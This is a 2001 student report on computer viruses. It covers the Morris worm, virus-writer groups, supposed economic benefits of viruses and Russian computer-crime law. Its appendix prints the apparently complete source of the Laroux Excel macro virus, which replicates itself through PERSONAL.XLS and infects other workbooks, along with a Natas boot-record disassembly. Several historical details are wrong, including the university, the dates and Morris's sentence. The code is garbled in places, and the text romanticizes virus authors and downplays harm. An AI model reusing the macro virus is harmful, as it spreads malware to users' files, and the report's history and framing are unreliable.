Computer viruses

Chuvash State University

Economic faculty

Report

COMPUTER VIRUSES

Author:
student of EC-13-98
Eugene Ivanov

Cheboxary – 2001

CONTENTS

A bit of history 3

What is a computer virus? 4

Who writes computer viruses? 5

To whose advantage computer viruses are written? 6

A legal notice. Penal Code of Russian Federation 7

Synopsis 8

SOURCES 9

Appendix 10

A bit of history

2 November 1988 Robert Morris younger (Robert Morris), graduate student of informatics faculty of Cornwall University (USA) infected a great amount of computers, connected to Internet network. This network unites machines of university centres, private companies and governmental agents, including National Aeronautics Space Administration, as well as some military scientific centres and labs.

Network worm has struck 6200 machines that formed 7,3% computers to network, and has shown, that UNIX not okay too. Amongst damaged were NASA, LosAlamos National Lab, exploratory centre VMS USA, California Technology Institute, and Wisconsin University (200 from 300 systems). Spread on networks ApraNet, MilNet, Science Internet, NSF Net it practically has removed these network from building. According to "Wall Street Journal", virus has infiltrated networks in Europe and Australia, where there were also registered events of blocking the computers.

Here are some recalls of the event participants:

Symptom: hundreds or thousands of jobs start running on a Unix system bringing response to zero.

Systems attacked: Unix systems, 4.3BSD Unix & variants (e.g.: SUNs) any sendmail compiled with debug has this problem. This virus is spreading very quickly over the Milnet. Within the past 4 hours, it has hit >10 sites across the country, both Arpanet and Milnet sites. Well over 50 sites have been hit. Most of these are "major" sites and gateways.

Method: Someone has written a program that uses a hole in SMTP Sendmail utility. This utility can send a message into another program.

Apparently what the attacker did was this: he or she connected to sendmail (i.e., telnet victim.machine 25), issued the appropriate debug command, and had a small C program compiled. (We have it. Big deal.) This program took as an argument a host number, and copied two programs – one ending in VAX.OS and the other ending in SunOS – and tried to load and execute them. In those cases where the load and execution succeeded, the worm did two things (at least): spawn a lot of shells that did nothing but clog the process table and burn CPU cycles; look in two places – the password file and the internet services file – for other sites it could connect to (this is hearsay, but I don't doubt it for a minute). It used both individual .host files (which it found using the password file), and any other remote hosts it could locate which it had a chance of connecting to. It may have done more; one of our machines had a changed superuser password, but because of other factors we're not sure this worm did it.

All of Vaxen and some of Suns here were infected with the virus. The virus forks repeated copies of itself as it tries to spread itself, and the load averages on the infected machines skyrocketed. In fact, it got to the point that some of the machines ran out of swap space and kernel table entries, preventing login to even see what was going on!

The virus also "cleans" up after itself. If you reboot an infected machine (or it crashes), the /tmp directory is normally cleaned up on reboot. The other incriminating files were already deleted by the virus itself.

4 November the author of the virus – Morris – come to FBI headquarters in Washington on his own. FBI has imposed a prohibition on all material relating to the Morris virus.

22 January 1989 a court of jurors has acknowledged Morris guilty. If denunciatory verdict had been approved without modification, Morris would have been sentenced to 5 years of prison and 250 000 dollars of fine. However Morris' attorney Thomas Guidoboni immediately has lodged a protest and has directed all papers to the Circuit Court with the petition to decline the decision of court... Finally Morris was sentenced to 3 months of prisons and fine of 270 thousand dollars, but in addition Cornwall University carried a heavy loss, having excluded Morris from its members. Author then had to take part in liquidation of its own creation.

What is a computer virus?

It is an executable code able to reproduce itself. Viruses are an area of pure programming, and, unlike other computer programs, carry intellectual functions on protection from being found and destroyed. They have to fight for survival in complex conditions of conflicting computer systems. That's why they evolve as if they were alive.

Yes, viruses seem to be the only alive organisms in the computer environment, and yet another their main goal is survival. That is why they may have complex crypting/decrypting engines, which is indeed a sort of a standard for computer viruses nowadays, in order to carry out processes of duplicating, adaptation and disguise

It is necessary to differentiate between reproducing programs and Trojan horses. Reproducing programs will not necessarily harm your system because they are aimed at producing as many copies (or somewhat-copies) of their own as possible by means of so-called agent programs or without their help. In the later case they are referred to as "worms".

Meanwhile Trojan horses are programs aimed at causing harm or damage to PC's. Certainly it's a usual practice, when they are part of "tech-organism", but they have completely different functions.

That is an important point. Destructive actions are not an integral part of the virus by default. However virus-writers allow presence of destructive mechanisms as an active protection from finding and destroying their creatures, as well as a response to the attitude of society to viruses and their authors.

As you see, there are different types of viruses, and they have already been separated into classes and categories. For instance: dangerous, harmless, and very dangerous. No destruction means a harmless one, tricks with system halts means a dangerous one, and finally with a devastating destruction means a very dangerous virus.

But viruses are famous not only for their destructive actions, but also for their special effects, which are almost impossible to classify. Some virus-writers suggest the following:
funny, very funny and sad or melancholy (keeps silence and infects). But one should remember that special effects must occur only after a certain number of contaminations. Users should also be given a chance to restrict execution of destructive actions, such as deleting files, formatting hard disks. Thereby virus can be considered to be a useful program, keeping a check on system changes and preventing any surprises such as of deletion of files or wiping out hard disks.

It sounds quite heretical to say such words about viruses, which are usually considered to be a disaster. The less person understands in programming and virology, the greater influence will have on him possibility of being infected with a virus. Thus, let's consider creators of viruses as the best source.

Who writes computer viruses?

They are lone wolves or programmers groups.

In spite of the fact that a lot of people think, that to write a computer virus is a hardship, it is no exactly so. Using special programs called "Virus creators" even beginners in computer world can build their own viruses, which will be a strain of a certain major virus. This is precisely the case with notorious virus "Anna Curnikova", which is actually a worm. The aim of creation of viruses in such way is pretty obvious: the author wants to become well known all over the world and to show his powers.

Somehow, the results of the attempt can be very sad (see a bit of history), only real professionals can go famous and stay uncaught. A good example is Dark Avenger. Yes, and it's yet another custom of participants of "the scene" – to take terrifying monikers (nicknames).

To write something really new and remarkable programmer should have some extra knowledge and skills, for example:

    good strategic thinking and intuition – releasing a virus and its descendants live their own independent life in nearly unpredictable conditions. Therefore the author must anticipate a lot of things;

    splendid knowledge of language of the Assembler1 and the operating system he writes for – the more there are mistakes in the virus the quicker its will be caught;

    attention to details and a skill to solve the most varied tactical questions – one won't write a compact, satisfactory working program without this abilities;

    a high professional discipline in order to join preceding points together.

A computer virus group is an informal non-profit organisation, uniting programmers–authors of viruses regardless of their qualifications. Everyone can become a member of the club, if he creates viruses, studies them for the reason of creation and spreading.

The aims they pursue together may differ from that of a single virus writer, although they usually also try to become as famous as possible. But in the same time they may render help to beginning programmers in the field of viruses and spread commented sources of viruses and virus algorithm descriptions.

One can't say that all of the group members write viruses in Assembler. Actually, you don't have to know any computer language or write any program code to become a member or a friend of the group. But programming in Assembler is preferred, Pascal, C++ and other high level languages are considered to be humiliating. It does make sense since programs compiled in Assembler are much smaller (0.5-5 kb) and therefore more robust. On the other hand Assembler is quite difficult to understand especially for beginners. One should think in the way computer does: all commands are send directly to the central processing unit of PC.

There are computer virus groups all over the world, few being more successful than others. It may be pretty hard to get in contact with them since they are quite typical representatives of computer underground world as well as (free)wares groups. Sometimes, however, creating viruses can become a respectable occupation, bringing constant income. After all, no one but the author of the virus can bring valuable information on the way it should be treated and cured.

To whose advantage computer viruses are written?

Copyleft (cl) is distribution of programs without registering the software, i.e. using a cracked copy. The practice is widely used in the territory of former USSR even by medium and big companies, to say nothing of ordinary users. This software is stolen, which involves criminal responsibility (see legal notice). One of the general valuables of our culture is a generosity, and you can't do anything about it. But at least freeware lovers should know that proceeding with the practice could be risky. That's the first use of computer viruses – as a sort of compensation to software developers.

In the very same way writing viruses usually does not bring profits to the author. At least when the authors of a virus and a cure to it are different persons. The situation is quite different when they are not, especially if the person manages to hide the fact of the double-dealing. And that is the second advantage of computer viruses.

Yes, developers of antiviral software gain money from selling their remedy to a new widely hyped by the mass media virus. Agitation can grow so strong that all and everyone dash to buy an antiviral protection against even a most harmless virus. The ordinal behaviour of share indexes in stock exchanges while a computer virus epidemic is to fall. Somehow, the shares of such companies as Symantec (which is famous for its Norton Antivirus) will soar up to the sky.

The tendency is especially significant in the world of emerging New Economy. This fancy word means an economy, based on computer services as the engine of the development. The system takes place in the United States. That is why we hardly ever hear the names of Dow Jones and Standard & Poor's in the mass media nowadays. Their place is occupied by NASDAQ Composite index, based on the National Association of Securities Dealers Automated Quotations system. The index is responsible for the performance of high-tech companies, the base of the New Economy.

We can't say for sure, but maybe in the nearest future the index will be influenced more by computers themselves, than brokers and dealers in the world stock exchanges. IBM Corporation has recently presented its new invention – an automated broker, which is indeed a mainframe (a very big computer) with specialised software. It is a descendant of mainframe DeepBlue, well known for its skills in chess field. Unfortunately, it seems that bad times have come for the whole economy of the USA, which also means problems for NASDAQ.

Nevertheless the initiative of IBM should certainly be greeted. Automated brokers seem to understand the volatility of indexes in a much quicker and rational way than human beings. There is an only drawback to eliminate – the problem of artificial intellect. Machine can't think as a human.

Maybe computer viruses could be of any use here too. After all, the flights to the Moon become a simple effect of inventing the new ways of civil population extermination during the Second World War (ballistic rockets). A wish to kill people did a fantastic daydream become reality within fifty years. The first computing machine was actively used while the first atomic bomb development. So sometimes even very bad, much more dangerous than viruses (name at least one person being victim of a cruel computer virus), can highly assist to the progress and bring a greater profit.

A legal notice. Penal Code of Russian Federation

Chapter 28. Crimes in sphere of computer information

Article 272. Illegitimate access to computer information

1. Illegitimate access to a law-protected computer information, i.e. information on the machine carrier, in electronic-computing machine (PC), PC system or its network, if it causes a destruction, blocking, modification or copying of information, breach of work PC, PC systems or its network, –

is punished by fine in the size from two to five hundred minimum sizes of labour payment, or in the size of salary/other profit of the convicted for a period from two to five months, or by corrective works for a period from six months to one year, or by deprivation of liberty for a term up to two years.

2. Same deed, performed by a group of persons on the preliminary collusion or by an organised group or a person using their official position, as well as having access to PC, PC system or to its network, –

is punished by fine in the size from five to eight hundred minimum sizes of labour payment, or in the size of salary/other profit of the convicted for a period from five to eight months, or by corrective works for a period from one to two years, or by arrest for a period from three to six months, or by deprivation of liberty for a term up to two years.

Article 273. Creation, use and spreading harmful programs for PC.

1. Making the programs for PC or a contributing the changes to exist programs, undoubtedly bringing about unauthorised deleting, blocking, modification, or copying information, breaking of PC functionality, PC systems or its network, as well as use or spreading of such programs or machine carriers with such programs –

is punished by deprivation of liberty for a term up to three years with the fine in the amount between two and five hundred minimum amounts of labour payment, or in the amount of salary/other profit of the convicted for a period from two five months.

2. The same deeds having caused on indiscretion heavy consequences, –

are punished by the deprivation of liberty for a term from three to seven years.

Synopsis

The history of computer viruses has begun recently, but it has already become legendary. Almost everyone knows a few awesome fables about these creatures, but hardy anyone understands what computer virus is.

Computer virus is an executable code able to reproduce itself. Viruses are an area of pure programming, and, unlike other computer programs, carry intellectual functions on protection from being found and destroyed. They have to fight for survival in complex conditions of conflicting computer systems.

Viruses seem to be the only alive organisms in the computer environment, and yet another their main goal is survival. That is why they may have complex crypting/decrypting engines, which is indeed a sort of a standard for computer viruses nowadays, in order to carry out processes of duplicating, adaptation and disguise

Viruses are written by lone wolves or programmers groups.

Using special programs called "Virus creators" even beginners in computer world can build their own viruses. The aim of creation of viruses in such way is pretty obvious: the author wants to become well known all over the world and to show his powers.

The results of the attempt can be very sad, only real professionals can go famous and stay uncaught. To write something really new and remarkable programmer should have some extra knowledge and skills.

A computer virus group is an informal non-profit organisation, uniting programmers–authors of viruses regardless of their qualifications. Everyone can become a member of the club, if he creates viruses, studies them for the reason of creation and spreading. You don't have to know any computer language or write any program code to become a member or a friend of the group. Programming in Assembler is preferred, Pascal, C++ and other high level languages are considered to be humiliating

There are computer virus groups all over the world, few being more successful than others. It may be pretty hard to get in contact with them since they are quite typical representatives of computer underground world as well as (free)wares groups. Sometimes, however, creating viruses can become a respectable occupation, bringing constant income. After all, no one but the author of the virus can bring valuable information on the way it should be treated and cured.

Developers of antiviral software gain money from selling their remedy to a new widely hyped by the mass media virus. Agitation can grow so strong that all and everyone dash to buy an antiviral protection against even a most harmless virus. The ordinal behaviour of share indexes in stock exchanges while a computer virus epidemic is to fall. Somehow, the shares of high-tech companies producing antiviral software will soar up to the sky.

An epidemic of foot-and-mouth disease has overwhelmed Europe in these days (March 15, 2001). It seems that a vast economic crisis is breaking out in America. World finances make their best to escape the worst.

A break-through in the sphere of artificial intellect development could prevent NASDAQ from complete falling down. The help may come from an unexpected side...

But don't forget that creation, use and spreading harmful programs for PC is a criminal offence, as well as using cracked versions of programs. Our penal code establishes a punishment up to seven years of jail.

And be aware that computer viruses came for a long time, unless forever.

SOURCES

    Penal Code of Russian Federation

    Handless N.N. Computer virology. Part 1: General principles of operation, categorization and catalogue of the most widespread viruses in operating system MS DOS. – Kiev, 1990.

    Infected Voice. Issue 1, September, 1994. – STEALTH group.

    Infected Voice. Issue 2, October, 1994. – STEALTH group.

    Infected Voice. Issue 3. December, 1994. – STEALTH group.

Appendix

An fragment of a macrovirus (Laroux), written in a high-level computer language (ExelVisualBasic)

Attribute VB_Name = "laroux"

sub> auto_open()

Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"

Application.OnSheetActivate = "check_files"

End sub>

sub> check_files()

Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"

c$ = Application.StartupPath

m$ = Dir(c$ & "\" & "PERSONAL.XLS")

If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0

If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0

whichfile = p + w * 10

Select Case whichfile

Case 10

Application.ScreenUpdating = False

n4$ = ActiveWorkbook.Name

Sheets("laroux").Visible = True

Sheets("laroux").Select

Sheets("laroux").Copy

With ActiveWorkbook

.Title = ""

.sub>ject = ""

.Author = ""

.Keywords = ""

.Comments = ""

End With

newname$ = ActiveWorkbook.Name

c4$ = CurDir()

ChDir Application.StartupPath

ActiveWindow.Visible = False

Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _

, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _

False, CreateBackup:=False

ChDir c4$

Workbooks(n4$).Sheets("laroux").Visible = False

Application.OnSheetActivate = ""

Application.ScreenUpdating = True

Application.OnSheetActivate = "personal.xls!check_files"

Case 1

Application.ScreenUpdating = False

n4$ = ActiveWorkbook.Name

p4$ = ActiveWorkbook.Path

s$ = Workbooks(n4$).Sheets(1).Name

If s$ <> "laroux" Then

Workbooks("PERSONAL.XLS").Sheets("laroux").Copy before:=Workbooks(n4$).Sheets(1)

Workbooks(n4$).Sheets("laroux").Visible = False

Else

End If

Application.OnSheetActivate = ""

Application.ScreenUpdating = True

Application.OnSheetActivate = "personal.xls!check_files"

Case Else

End Select

End sub>

1 Assembler - a low level, hardware- oriented computer language

An example of boot record virus (Natas), written in a low-level computer language
(Assembler)
A fragment of infected boot record


A fragment of boot record cured by DoctorWeb


hex adress dump possible assembler source
hex adress dump possible assembler source
00000034: 2020 and byte ptr [bx+si],ah 00000034: 2020 and byte ptr [bx+si],ah
00000036: 46 inc si 00000036: 46 inc si
00000037: 41 inc cx 00000037: 41 inc cx
00000038: 54 push sp 00000038: 54 push sp
00000039: 3132 xor word ptr [bp+si],si 00000039: 3132 xor word ptr [bp+si],si
0000003B: 2020 and byte ptr [bx+si],ah 0000003B: 2020 and byte ptr [bx+si],ah
0000003D: 20F1 and cl,dh 0000003D: 20F1 and cl,dh
0000003F: 7DE8 (1) jnl 00000029 0000003F: 7DA9 jnl 0000FFEA
00000041: 0000 add byte ptr [bx+si],al 00000041: 3D84BB cmp ax,BB84
00000043: BF4000 mov di,0040 00000044: 61 popa
00000046: 8EDF mov ds,di 00000045: 2CBF sub> al,BF
00000048: 836DD306 sub> word ptr [di-2D],0006 00000047: 92 xchg ax,dx
0000004C: 8B45D3 mov ax,word ptr [di-2D] 00000048: C7C3665E mov bx,5E66
0000004F: B10A mov cl,0A 0000004C: BFE236 mov di,36E2
00000051: D3C8 ror ax,cl 0000004F: F1 icebp
00000053: 8EC0 mov es,ax 00000050: 035C27 add bx,word ptr [si+27]
00000055: B80902 mov ax,0209 00000053: BE96D1 mov si,D196
00000058: 33DB xor bx,bx 00000056: 6B4D4AC0 imul cx,word ptr [di+4A],C0
0000005A: B9014F mov cx,4F01 0000005A: 7A65 (1) jp 000000C1
0000005D: BA0001 mov dx,0100 0000005C: DE7883 fidivr word ptr [bx+si-7D]
00000060: CD13 int 13 0000005F: 9ACF6C879D call 9D87:6CCF
00000062: 7203 (1) jb 00000067 00000064: CF iret
00000064: 06 push es 00000065: 0361B4 add sp,word ptr [bx+di-4C]
00000065: 53 push bx 00000068: C4FE les di,(Invalid)si
00000066: CB retf 0000006A: 0F8B4618 jnp 000018B4
00000067: CD18 int 18
00000069: FE0F dec byte ptr [bx]
0000006B: 8B4618 mov ax,word ptr [bp+18]
0000006E: 8845F9 mov byte ptr [di-07],al 0000006E: 8845F9 mov byte ptr [di-07],al
00000071: FB sti 00000071: FB sti
00000072: 386624 cmp byte ptr [bp+24],ah 00000072: 386624 cmp byte ptr [bp+24],ah
00000075: 7C04 (2) jl 0000007B 00000075: 7C04 (2) jl 0000007B





Find 10 differences (or more)!